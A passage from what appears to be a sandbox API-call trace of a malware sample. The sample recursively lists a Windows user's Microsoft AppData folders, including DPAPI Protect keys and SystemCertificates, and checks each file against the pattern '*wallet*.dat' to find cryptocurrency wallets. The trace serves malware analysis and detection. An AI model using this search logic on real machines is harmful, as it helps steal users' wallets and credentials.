| out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect") returned 55 [0207.468] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\Protect") returned 17 [0207.468] PathMatchSpecA (pszFile="Protect", pszSpec="*wallet*.dat") returned 0 [0207.468] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*") returned 57 [0207.469] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a48 [0207.469] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.469] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91e9a4bb, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x138, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0207.469] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0207.469] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\CREDHIST") returned 26 [0207.469] PathMatchSpecA (pszFile="CREDHIST", pszSpec="*wallet*.dat") returned 0 [0207.469] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST\\*") returned 66 [0207.469] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91e9a4bb, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x138, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="C", cAlternateFileName="TEMPÐ\x07\x02")) returned 0xffffffff [0207.470] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5088b163, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0207.470] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned 102 [0207.470] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned 64 [0207.470] PathMatchSpecA (pszFile="S-1-5-21-1560258661-3990802383-1811730007-1000", pszSpec="*wallet*.dat") returned 0 [0207.470] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*") returned 104 [0207.470] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x9a76ba0c, ftLastAccessTime.dwHighDateTime=0x1d75217, ftLastWriteTime.dwLowDateTime=0x9a76ba0c, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a88 [0207.470] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x9a76ba0c, ftLastAccessTime.dwHighDateTime=0x1d75217, ftLastWriteTime.dwLowDateTime=0x9a76ba0c, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.470] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9a745757, ftCreationTime.dwHighDateTime=0x1d75217, ftLastAccessTime.dwLowDateTime=0x9a745757, ftLastAccessTime.dwHighDateTime=0x1d75217, ftLastWriteTime.dwLowDateTime=0x9a7de0ec, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="b1182ce8-69d1-4194-8156-bc78cfec3a39", cAlternateFileName="B1182C~1")) returned 1 [0207.470] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39") returned 139 [0207.470] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39") returned 101 [0207.470] PathMatchSpecA (pszFile="b1182ce8-69d1-4194-8156-bc78cfec3a39", pszSpec="*wallet*.dat") returned 0 [0207.471] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39\\*") returned 141 [0207.471] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9a745757, ftCreationTime.dwHighDateTime=0x1d75217, ftLastAccessTime.dwLowDateTime=0x9a745757, ftLastAccessTime.dwHighDateTime=0x1d75217, ftLastWriteTime.dwLowDateTime=0x9a7de0ec, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="b", cAlternateFileName="J")) returned 0xffffffff [0207.471] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91ec0737, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="cfeedb70-e610-451b-90c2-def194b5fe80", cAlternateFileName="CFEEDB~1")) returned 1 [0207.471] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80") returned 139 [0207.471] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80") returned 101 [0207.471] PathMatchSpecA (pszFile="cfeedb70-e610-451b-90c2-def194b5fe80", pszSpec="*wallet*.dat") returned 0 [0207.471] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80\\*") returned 141 [0207.471] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91ec0737, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="c", cAlternateFileName="J")) returned 0xffffffff [0207.471] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9a82a5a9, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0207.471] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred") returned 112 [0207.471] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred") returned 74 [0207.471] PathMatchSpecA (pszFile="Preferred", pszSpec="*wallet*.dat") returned 0 [0207.472] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9a82a5a9, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="P", cAlternateFileName="J")) returned 0xffffffff [0207.472] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9a82a5a9, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0207.472] FindClose (in: hFindFile=0x5e7a88 | out: hFindFile=0x5e7a88) returned 1 [0207.472] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9206413c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0207.472] PathMatchSpecA (pszFile="SYNCHIST", pszSpec="*wallet*.dat") returned 0 [0207.472] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9206413c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="S", cAlternateFileName="PREFÐ\x07\x02")) returned 0xffffffff [0207.472] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9206413c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0207.473] FindClose (in: hFindFile=0x5e7a48 | out: hFindFile=0x5e7a48) returned 1 [0207.473] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Spelling", cAlternateFileName="")) returned 1 [0207.473] PathMatchSpecA (pszFile="Spelling", pszSpec="*wallet*.dat") returned 0 [0207.473] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7b88 [0207.474] FindNextFileA (in: hFindFile=0x5e7b88, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.474] FindNextFileA (in: hFindFile=0x5e7b88, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="en-US", cAlternateFileName="")) returned 1 [0207.474] PathMatchSpecA (pszFile="en-US", pszSpec="*wallet*.dat") returned 0 [0207.474] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a48 [0207.474] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.475] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x567d5b26, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.acl", cAlternateFileName="")) returned 1 [0207.475] PathMatchSpecA (pszFile="default.acl", pszSpec="*wallet*.dat") returned 0 [0207.475] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.acl\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x567d5b26, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="d", cAlternateFileName="J")) returned 0xffffffff [0207.475] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5648e4eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5648e4eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5648e4eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.dic", cAlternateFileName="")) returned 1 [0207.475] PathMatchSpecA (pszFile="default.dic", pszSpec="*wallet*.dat") returned 0 [0207.475] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.dic\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5648e4eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5648e4eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5648e4eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="d", cAlternateFileName="J")) returned 0xffffffff [0207.475] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a47fe, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x566a47fe, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x566a47fe, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.exc", cAlternateFileName="")) returned 1 [0207.475] PathMatchSpecA (pszFile="default.exc", pszSpec="*wallet*.dat") returned 0 [0207.475] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.exc\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a47fe, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x566a47fe, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x566a47fe, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="d", cAlternateFileName="J")) returned 0xffffffff [0207.475] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a47fe, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x566a47fe, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x566a47fe, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.exc", cAlternateFileName="")) returned 0 [0207.475] FindClose (in: hFindFile=0x5e7a48 | out: hFindFile=0x5e7a48) returned 1 [0207.476] FindNextFileA (in: hFindFile=0x5e7b88, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="en-US", cAlternateFileName="")) returned 0 [0207.476] FindClose (in: hFindFile=0x5e7b88 | out: hFindFile=0x5e7b88) returned 1 [0207.476] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0207.476] PathMatchSpecA (pszFile="SystemCertificates", pszSpec="*wallet*.dat") returned 0 [0207.476] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e08 [0207.476] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.476] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="My", cAlternateFileName="")) returned 1 [0207.476] PathMatchSpecA (pszFile="My", pszSpec="*wallet*.dat") returned 0 [0207.477] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7848 [0207.477] FindNextFileA (in: hFindFile=0x5e7848, lpFindFileData=0x19bf38 | out: 